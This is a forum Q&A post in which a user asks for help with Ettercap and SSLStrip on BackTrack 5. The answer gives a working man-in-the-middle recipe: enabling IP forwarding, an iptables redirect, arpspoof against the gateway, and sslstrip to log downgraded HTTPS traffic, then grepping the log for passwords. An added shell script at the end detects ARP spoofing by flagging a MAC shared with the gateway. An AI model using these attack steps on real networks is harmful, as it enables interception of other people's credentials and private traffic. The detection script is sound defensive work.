I am using BackTrack 5 for this, but I am stuck... I am not able to get the data I want. I am using Ettercap and SSLStrip for this...

Does anyone here have any idea of how to do it?


Solution

Idk how you're doing it, but for me ettercap-gtk (the gui) has always been garbage. I recommend skipping ettercap unless you want easy DNS spoofing, and go another route.

Let me give you some steps, starting with setting up your iptables for this attack (Man in the middle, amirite) and enabling ip_forward(ing)

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (Can choose any port you want to send them to)

Now to be the man in the middle: Here we use arpspoof: arpspoof -i wlan0(or whatever interface) 192.168.1.X(X is the gateway typically .1 or .255)

Then with SSLStrip you can go ahead and ./sslstrip.py -1 1337 -w filename (1337 is the port from earlier, filename is any filename you want to dump the data to)

cat filename(from earlier) and even pipe | grep "password" or whatever you're sniffing for, or you can just dump everything. The file will be filling up with captured/stripped https data.
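
Seen from the defending side, the ARP spoofing step in the answer above leaves a trace in a victim's ARP table: the gateway IP resolves to a MAC address that also answers for another host. A detection sketch follows, added here and not part of the original answer; the sample table is constructed and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: flag ARP-table entries where one MAC answers for several IPs.
# Input is text in the format of /proc/net/arp on Linux.

# Constructed sample: gateway 192.168.1.1 and host 192.168.1.57 share a MAC.
SAMPLE_ARP='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        wlan0
192.168.1.23     0x1         0x2         66:77:88:99:aa:bb     *        wlan0
192.168.1.57     0x1         0x2         00:11:22:33:44:55     *        wlan0
192.168.1.80     0x1         0x0         00:00:00:00:00:00     *        wlan0'

# find_shared_macs: read an ARP table on stdin and print "mac ip1,ip2,..."
# for every MAC bound to more than one IP. Incomplete entries (flags 0x0 or
# an all-zero MAC) are skipped. Multi-homed hosts and proxy ARP can also
# produce shared MACs, so treat a hit as something to investigate.
find_shared_macs() {
  awk 'NR > 1 && $3 != "0x0" && $4 != "00:00:00:00:00:00" {
         mac = tolower($4)
         if (mac in ips) ips[mac] = ips[mac] "," $1; else ips[mac] = $1
         count[mac]++
       }
       END {
         for (mac in count) if (count[mac] > 1) print mac, ips[mac]
       }' | sort
}

# gateway_mac_shared GATEWAY_IP: ARP table on stdin. Exit status 0 when the
# gateway's MAC is also bound to another IP, 1 otherwise.
gateway_mac_shared() {
  find_shared_macs | awk -v gw="$1" '
    { n = split($2, ip, ","); for (i = 1; i <= n; i++) if (ip[i] == gw) hit = 1 }
    END { exit !hit }'
}

# Demo on the constructed sample. On a live host, feed the real table:
#   gateway_mac_shared 192.168.1.1 < /proc/net/arp
if printf '%s\n' "$SAMPLE_ARP" | gateway_mac_shared 192.168.1.1; then
  echo "ALERT: gateway MAC also answers for another IP:"
  printf '%s\n' "$SAMPLE_ARP" | find_shared_macs
fi
```
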

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow